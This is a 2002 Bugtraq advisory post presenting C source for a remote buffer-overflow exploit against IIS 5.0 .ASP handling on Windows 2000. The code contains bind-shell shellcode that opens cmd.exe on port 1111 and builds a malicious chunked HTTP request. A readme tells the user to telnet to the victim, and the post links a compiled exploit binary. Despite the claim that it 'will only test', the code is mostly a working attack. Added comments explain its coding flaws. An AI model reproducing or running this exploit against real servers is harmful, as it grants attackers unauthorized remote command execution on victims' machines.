
Windows 2000 Server IIS 5.0 .ASP Overflow Exploit


Date: 4 May 2002 15:42:52 -0000
From: CHINANSL Security Team <lovehacker@chinansl.com>
To: bugtraq@securityfocus.com
Subject: Windows 2000 Server IIS 5.0 .ASP Overflow Exploit



Summary:
========

The following code will allow you to safely test your 
system for the vulnerability mentioned below. For more 
information about this vulnerability see 
http://www.eeye.com/html/press/PR20020410.html and the previous 
article: "Windows 2000 and NT4 IIS .ASP Buffer Overflow".
The following code comes from CHINANSL TECHNOLOGY CO.,LTD. 
For more information about our company see 
http://www.chinansl.com.

Exploit:
========

--------------------CUT HERE--------------------------------
/*
Windows 2000 Server Exploit By CHINANSL Security Team.
Test on Windows 2000 Chinese Version, IIS 5.0 , not patched.
Warning:THIS PROGRAM WILL ONLY TEST.
CHINANSL Technology CO.,LTD
http://www.chinansl.com
keji@chinansl.com
*/

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment (lib,"Ws2_32")

int main(int argc, char* argv[])
{
	// Usage: <ip> <port> <asp-file-path>; any other argument count prints help.
	if(argc != 4)
	{
		printf("%s ip port aspfilepath\n\n",argv
[0]);
		printf("	ie. %s 127.0.0.1 
80 /iisstart.asp\n",argv[0]);
		puts("	programed by keji@chinansl.com");

		return 0;
	}

	// Both addresses are hard-coded constants; the header comment says the
	// program was tested on one unpatched Windows 2000 (Chinese) build only,
	// so nothing here is derived at run time.
	DWORD srcdata=0x01e2fb1c-4;//0x00457474;	
		//address of SHELLCODE
	DWORD 
jmpaddr=0x00457494;//0x77ebf094;//0x01e6fcec;//"\x1c\xfb\xe6
\x01";///"\x0c\xfb\xe6\x01";

	// Command-line input is used as-is: atoi() reports no error for a
	// non-numeric port (strtol would), and destIP/destFile lengths are never
	// checked before they are formatted into sendbuff below.
	char* destIP=argv[1];
	char* destFile=argv[3];
	int webport=atoi(argv[2]);
	char* pad="\xcc\xcc\xcc\xcc"  "ADPA"  "\x02\x02\x02
\x02"  "PADP";				//16 bytes

	WSADATA	ws;
	SOCKET	s;
	long result=0;
	if(WSAStartup(0x0101,&ws) != 0)
	{
		puts("WSAStartup() error");
		return -1;
	}

	// inet_addr()'s return value is not checked, so a malformed address is
	// only noticed when connect() fails. Socket failure is compared against
	// -1 rather than INVALID_SOCKET. None of the early "return -1" paths in
	// this function call closesocket() or WSACleanup(); process exit is
	// relied on for cleanup.
	struct	sockaddr_in addr;
	addr.sin_family=AF_INET;
	addr.sin_port=htons(webport);
	addr.sin_addr.s_addr=inet_addr(destIP);
	s=socket(AF_INET,SOCK_STREAM,0);
	if(s==-1)
	{
		puts("Socket create error");
		return -1;
	}
	
	if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) 
== -1)
	{
		puts("Cannot connect to the specified 
host");
		return -1;
	}

	char buff[4096];
	// Payload bytes (opaque here). Its length is taken with strlen() below,
	// so the byte string must not contain 0x00 or it is silently truncated.
char* shellcode=

"\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33
\xc9\x89"
"\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65
\x6c\x33\x32"
"\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32
\x2e\xab"
"\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32
\xc0\x4f"
"\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53
\xff\xd0\x89"
"\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53
\xff\xd0"
"\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75
\xfc\xff\xd3\x89"
"\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6
\x66\xbe"
"\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66
\xbe\x3e\x02\x56"
"\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56
\xff\x75\xfc"
"\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75
\xfc\xff\xd3\x89"
"\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75
\xfc\xff\xd3\x89"
"\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75
\xfc\xff\xd3\x89"
"\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45
\xe0\x6a"
"\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8
\xff\xd3"
"\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3
\x89\x45"
"\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13
\xff\x75\xf8"
"\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45
\xc8\x6a"
"\x03\xff\x75\xf8\xff\xd3\x89\x85
\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
"\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0
\xab\xf7\xd0"
"\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8
\xab\x33\xc0"
"\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50
\xff\x55"
"\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4
\x6a\x10"
"\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75
\xc4\xff"
"\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45
\xc0\x33"
"\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50
\xff\x55"
"\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45
\x94\x50"
"\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44
\x32\xc0"
"\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01
\x89\x47"
"\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89
\x47\x3c"
"\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85
\x38\xff"
"\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51
\x53\xff"
"\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34
\xff\xff\xff\x89"
"\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85
\x2c\xff\xff\xff\x50"
"\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85
\x2c\xff\xff\xff\x85"
"\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85
\x2c\xff\xff\xff\x50\x53"
"\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0
\x74\x6d"
"\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30
\xff\xff\xff\xff"
"\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90
\x90\x90"
"\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90
\x33\xc0"
"\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0
\xff\x55\xc8"
"\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50
\x8d\x85"
"\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30
\xff\xff"
"\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4
\xff\x75\xc4"
"\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95
\x1c\xff\xff\xff\x6a"
"\xff\xff\x95\x18\xff\xff\xff";


		// Request fragments. The HTTP version was moved out of s1 into the
		// sprintf() format string below (see the trailing comment on s1).
		// s5 ends the header block with the blank line; sc is the
		// zero-length terminating chunk.
		char* s1="POST ";// HTTP/1.1\r\n";
		char* s2="Accept: */*\r\n";
		char* s4="Content-Type: application/x-www-
form-urlencoded\r\n";
		char* s5="Transfer-Encoding: 
chunked\r\n\r\n";
		char* sc="0\r\n\r\n\r\n";

		// 8 KiB filled with 0x90; the payload is copied to the very end and
		// the last byte is set to NUL so the whole buffer can be formatted
		// with %s. This buffer ends up in the request's query string.
		char shellcodebuff[1024*8];
		memset(shellcodebuff,0x90,sizeof
(shellcodebuff));
		memcpy(&shellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1],shellcode,strlen(shellcode));
		shellcodebuff[sizeof(shellcodebuff)-1] = 0;


	// sprintf() is unbounded: the fixed parts plus the 8 KiB query string
	// fit in 16 KiB, but destFile and destIP come straight from argv, so a
	// long argument overruns sendbuff (snprintf with sizeof sendbuff would be
	// the safe form). The chunked body is: a 0x10-byte chunk (pad), two
	// 4-byte marker chunks ("AAAA", "BBBB"), then the terminating "0" chunk.
	// The srcdata/jmpaddr arguments are commented out here because they are
	// patched in by the two writes below instead.
	char sendbuff[1024*16];
	memset(sendbuff,0,1024*16);

	sprintf(sendbuff,"%s%s?%s HTTP/1.1\r\n%sHost: %
s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%
s",s1,destFile,shellcodebuff,s2,destIP,s4,s5,pad/*,srcdata,j
mpaddr*/,sc);


	// sendlen is taken before the two 4-byte overwrites because those
	// values may contain 0x00 bytes, which would make strlen() stop early.
	// strstr() is assumed to find both markers (no NULL check), and if
	// destFile itself contains "AAAA" or "BBBB" the first match is in the
	// path rather than in the marker chunk. Storing a DWORD through a
	// char * is an unaligned, aliasing-unfriendly write; memcpy() would be
	// the portable form.
	int sendlen=strlen(sendbuff);
    *(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr;
	*(DWORD *)strstr(sendbuff,"AAAA") = srcdata;

	// send() failure is reported as -1 (SOCKET_ERROR); a partial send is
	// not detected, and the socket is leaked on the error path.
	result=send(s,sendbuff,sendlen,0);
	if(result == -1 )
	{
		puts("Send shellcode error!");
		return -1;
	}

	// recv()'s result is ignored. buff is zeroed first, but a reply that
	// fills all 4096 bytes leaves no NUL, so the strstr() below can read
	// past the end of buff; recv(s, buff, sizeof(buff)-1, 0) would keep
	// the terminator.
	memset(buff,0,4096);
	result=recv(s,buff,sizeof(buff),0);

	// A normal HTML reply means the server served the request as an
	// ordinary page; that is treated as failure.
	if(strstr(buff,"<html>") != NULL)
	{
		shutdown(s,0);
		closesocket(s);

		puts("Send shellcode error!Try again!");
		return -1;
	}
	

	// Success path: release the socket and print the follow-up instruction.
	// WSACleanup() is never called on any path.
	shutdown(s,0);
	closesocket(s);
	printf("\nUse <telnet %s 1111> to connect to the 
host\n",destIP);
	puts("If you cannot connect to the host,try run 
this program again!");

  return 0;
}
---------------------------End------------------------------

Readme:
=======

    This .asp overflow exploit will open port 1111 and bind 
cmd.exe. One thing should be noted: every time you run this 
exploit, a message will show that the exploit worked 
perfectly, but that does not mean you can get access to the 
target host. The reason is that on some occasions a message 
box will appear on the victim's terminal screen showing that 
an AV (Access Violation) has occurred. This dialog must be 
closed by the recipient, otherwise you cannot gain access 
even if you continue your attack.

Download:
=========

    http://download.chinansl.com/aspexploit.exe

Solution:
=========

    patch:http://www.microsoft.com/Downloads/Release.asp?
ReleaseID=37824

Reference:
==========

  Copyright 2001-2002 CHINANSL. All Rights Reserved.
  This information comes from CHINANSL TECHNOLOGY 
CO.,LTD. It may be redistributed, but please keep the 
article complete; otherwise we will pursue our legal 
rights.
  www.chinansl.com 
  lovehacker@chinansl.com 

